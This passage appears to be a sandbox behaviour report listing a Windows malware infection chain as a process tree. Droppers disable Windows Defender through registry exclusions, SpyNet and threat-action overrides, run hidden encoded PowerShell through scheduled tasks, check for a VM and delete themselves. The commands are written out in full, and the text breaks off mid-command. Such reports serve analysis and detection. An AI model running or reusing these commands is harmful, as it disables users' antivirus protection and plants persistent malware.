--server-tracking-blob=OTlmNmE3OWM3MzgyMjJjM2Y0ZTYzZTQzY2UyYzdjN2Q5Nzk3MTM0MzRiMjBlYjZhZjM3MjNjZDhmYWZiZTRhNzp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcxMTU5MjM3MC4xMTQxIiwidXRtIjp7ImNhbXBhaWduIjoiNzY3IiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoibWt0In0sInV1aWQiOiJlYTU4NGE5Yy02ZDkwLTQ1ODgtYTljYi01MjUyODNiZWMxOWEifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=94050000000000004⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
PID:2024 -
C:\Users\Admin\Pictures\WZ5cX3pyFhvxZFq1AmkufeHv.exeC:\Users\Admin\Pictures\WZ5cX3pyFhvxZFq1AmkufeHv.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.33 --initial-client-data=0x2a4,0x2a8,0x2ac,0x274,0x2b0,0x6d94e1a8,0x6d94e1b4,0x6d94e1c05⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1108
-
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403280219401\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403280219401\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe"4⤵
- Executes dropped EXE
PID:5308
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403280219401\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403280219401\assistant\assistant_installer.exe" --version4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4504 -
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403280219401\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403280219401\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.20 --initial-client-data=0x268,0x26c,0x270,0x244,0x274,0xe30040,0xe3004c,0xe300585⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4620
-
-
-
-
C:\Users\Admin\Pictures\yuVVFMVY94h4dq6orGkzD9rD.exe"C:\Users\Admin\Pictures\yuVVFMVY94h4dq6orGkzD9rD.exe"3⤵
- Executes dropped EXE
PID:212 -
C:\Users\Admin\AppData\Local\Temp\7zS851E.tmp\Install.exe.\Install.exe4⤵
- Executes dropped EXE
PID:3436 -
C:\Users\Admin\AppData\Local\Temp\7zS882B.tmp\Install.exe.\Install.exe /FHdidhi "385118" /S5⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Enumerates system info in registry
PID:4136 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"6⤵PID:4444
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&7⤵PID:2208
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:328⤵PID:4600
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:648⤵PID:1796
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"6⤵PID:3740
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&7⤵PID:2796
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:328⤵PID:4204
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:648⤵PID:2880
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gqAfqLMsJ" /SC once /ST 01:29:11 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="6⤵
- Creates scheduled task(s)
PID:3168
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gqAfqLMsJ"6⤵PID:4620
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gqAfqLMsJ"6⤵PID:4200
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bdnnguwcOLBYKAjbbA" /SC once /ST 02:21:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\ndbwepu.exe\" id /mCsite_idWPi 385118 /S" /V1 /F6⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:5368
-
-
-
-
-
C:\Users\Admin\Pictures\UeBGJdQZVUuurvvrtFOtjUqE.exe"C:\Users\Admin\Pictures\UeBGJdQZVUuurvvrtFOtjUqE.exe"3⤵
- Modifies firewall policy service
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2636
-
-
C:\Users\Admin\Pictures\aqscNlEwGraum9ul3o4DymK7.exe"C:\Users\Admin\Pictures\aqscNlEwGraum9ul3o4DymK7.exe"3⤵
- Executes dropped EXE
PID:5956 -
C:\Users\Admin\AppData\Local\Temp\7zSC052.tmp\Install.exe.\Install.exe4⤵
- Executes dropped EXE
PID:5156 -
C:\Users\Admin\AppData\Local\Temp\7zSC340.tmp\Install.exe.\Install.exe /FHdidhi "385118" /S5⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Enumerates system info in registry
PID:1276 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"6⤵PID:5560
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:5608
-
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&7⤵PID:5288
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:328⤵PID:5360
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:648⤵PID:3192
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"6⤵PID:5356
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&7⤵PID:888
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:328⤵PID:4444
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:648⤵PID:2052
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gXsUHyRfW" /SC once /ST 01:39:32 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="6⤵
- Creates scheduled task(s)
PID:2208
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gXsUHyRfW"6⤵PID:5256
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gXsUHyRfW"6⤵PID:5392
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bdnnguwcOLBYKAjbbA" /SC once /ST 02:21:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\puXYKqB.exe\" id /Jysite_idmve 385118 /S" /V1 /F6⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4872
-
-
-
-
-
C:\Users\Admin\Pictures\2sK9qcVeMtm0aymJpbObEY9P.exe"C:\Users\Admin\Pictures\2sK9qcVeMtm0aymJpbObEY9P.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6032 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\Pictures\2sK9qcVeMtm0aymJpbObEY9P.exe"4⤵PID:2628
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.15⤵
- Runs ping.exe
PID:6048
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 2244 -ip 22441⤵PID:216
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1108 -ip 11081⤵PID:5036
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 1108 -ip 11081⤵PID:3332
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 3092 -ip 30921⤵PID:4400
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:2804
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:3088
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2952 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:5952
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 3636 -ip 36361⤵PID:5464
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4444 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:6024
-
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:5860
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:4380
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:5528
-
C:\Windows\windefender.exeC:\Windows\windefender.exe1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:4432
-
C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\puXYKqB.exeC:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\puXYKqB.exe id /Jysite_idmve 385118 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:2452 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3808 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵PID:5856
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:5528
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:4380
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:5628
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:5212
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:3148
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:5244
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:1832
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:5900
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:5880
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:5616
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:4128
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:4372
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:3068
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:2376
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:4436
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:3584
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:5320
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:3092
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:5648
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:5808
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:5076
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:5824
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:2364
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:3380
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:2108
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:5168
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:5520
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:2880
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LCifMpYymZWU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LCifMpYymZWU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gbPxNkbXHfUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gbPxNkbXHfUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mVqQIGUXDOgrC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows 